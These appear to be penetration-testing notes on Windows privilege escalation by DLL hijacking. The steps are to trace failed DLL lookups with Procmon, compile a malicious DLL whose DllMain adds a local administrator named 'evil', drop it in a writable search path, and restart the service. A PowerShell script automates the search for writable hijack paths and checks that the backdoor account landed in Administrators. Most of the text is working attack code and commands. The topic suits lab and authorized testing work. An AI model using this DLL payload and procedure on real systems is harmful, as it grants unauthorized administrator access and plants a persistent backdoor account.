Run Procmon as administrator inside the RDP session (Procmon needs admin rights to load its filter driver, so on a real engagement this discovery step is done on a replica of the target rather than the box you are escalating on).
Add filters: Process Name is cmd.exe, as these notes trace that process. Adding Result is NAME NOT FOUND and Path ends with .dll narrows the output to DLL lookups that failed, which is exactly where a hijack is possible.
Procmon will now show more output as the service runs.
Check for a .dll path that was searched but not found in a directory you can write to (check with icacls on the directory, or simply try to create a file there).
Now create a DLL with that same file name from the windows_dll.c below on Kali:
<aside>
👨💻 windows_dll.c (compile on Kali with mingw-w64)

```c
// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
#include <windows.h>
#include <stdlib.h>   /* system() */

/* Called by the loader when the service process maps this DLL. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH) {
        /* Runs with the service account's privileges, so add a local admin.
         * /c runs the command and exits; the commonly copied /k keeps cmd.exe
         * open and would block system() if the host had a console attached. */
        system("cmd.exe /c net user evil pass1234 /add");
        system("cmd.exe /c net localgroup administrators evil /add");
        /* Terminate the host process; the service does not need to keep running. */
        ExitProcess(0);
    }
    return TRUE;
}
```
</aside>
Transfer the compiled DLL to the writable location found with Procmon, keeping the exact file name the service looked for.
Restart the service so it loads the DLL: from cmd, sc stop dllsvc & sc start dllsvc (in PowerShell use sc.exe, because sc there is an alias for Set-Content).
The service runs with a privileged account, so DllMain adds the user evil to the Administrators group; confirm with net localgroup administrators. If the user is missing, the usual cause is a password-complexity policy rejecting pass1234, so pick a password that satisfies it.
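As an added example (not part of the original notes), the following PowerShell automates the discovery step and the final check: it parses a Procmon CSV export (File > Save, CSV format) for NAME NOT FOUND lookups of .dll files, tests whether each search directory is genuinely writable by probing it instead of reading ACLs by hand, and then verifies that the user landed in Administrators. The CSV path C:\Temp\procmon.csv and the process name passed in are assumptions; the user name evil and the service dllsvc are from the notes.

```powershell
# Added example, not from the original notes. Triage a Procmon CSV export for
# DLL-hijack candidates, confirm the search directory is writable, and verify
# the payload's effect afterwards.
# Assumptions (hypothetical): Procmon output saved as C:\Temp\procmon.csv and
# the traced process is the one passed via -ProcessName.

function Get-DllHijackCandidates {
    param(
        [Parameter(Mandatory)] [string] $CsvPath,
        [string] $ProcessName            # e.g. 'cmd.exe' as in the notes; empty = any process
    )
    # Procmon CSV columns: Time of Day, Process Name, PID, Operation, Path, Result, Detail
    Import-Csv -Path $CsvPath |
        Where-Object {
            $_.Result -eq 'NAME NOT FOUND' -and
            $_.Path   -like '*.dll' -and
            (-not $ProcessName -or $_.'Process Name' -ieq $ProcessName)
        } |
        Select-Object -ExpandProperty Path -Unique
}

function Test-DirectoryWritable {
    param([Parameter(Mandatory)] [string] $Directory)
    # Evaluating ACLs by hand gets inheritance, deny ACEs and group membership
    # wrong easily, so actually try to create and remove a scratch file.
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Find-WritableDllPaths {
    param(
        [Parameter(Mandatory)] [string] $CsvPath,
        [string] $ProcessName
    )
    foreach ($path in Get-DllHijackCandidates -CsvPath $CsvPath -ProcessName $ProcessName) {
        $dir = Split-Path -Parent $path
        [pscustomobject]@{
            MissingDll = $path            # name the compiled DLL must have
            Directory  = $dir
            Writable   = Test-DirectoryWritable -Directory $dir
        }
    }
}

function Test-LocalAdminMember {
    param([Parameter(Mandatory)] [string] $User)
    # 'net localgroup' output is locale-dependent; Get-LocalGroupMember is not.
    $members = Get-LocalGroupMember -Group 'Administrators' -ErrorAction Stop |
        ForEach-Object { ($_.Name -split '\\')[-1] }
    return ($members -icontains $User)
}

# Usage (hypothetical CSV path): only failed DLL lookups in a directory we can
# write to are real hijack candidates.
Find-WritableDllPaths -CsvPath 'C:\Temp\procmon.csv' -ProcessName 'cmd.exe' |
    Where-Object Writable | Format-Table -AutoSize

# After dropping the compiled DLL under one of those paths and restarting the
# service (sc.exe stop dllsvc; sc.exe start dllsvc), confirm the payload ran:
Test-LocalAdminMember -User 'evil'
```

The writability probe is deliberate: a directory can look writable in icacls and still reject writes through a deny ACE or a missing group membership, and the opposite also happens, so creating a file is the only test that matches what the service's DLL search will actually see.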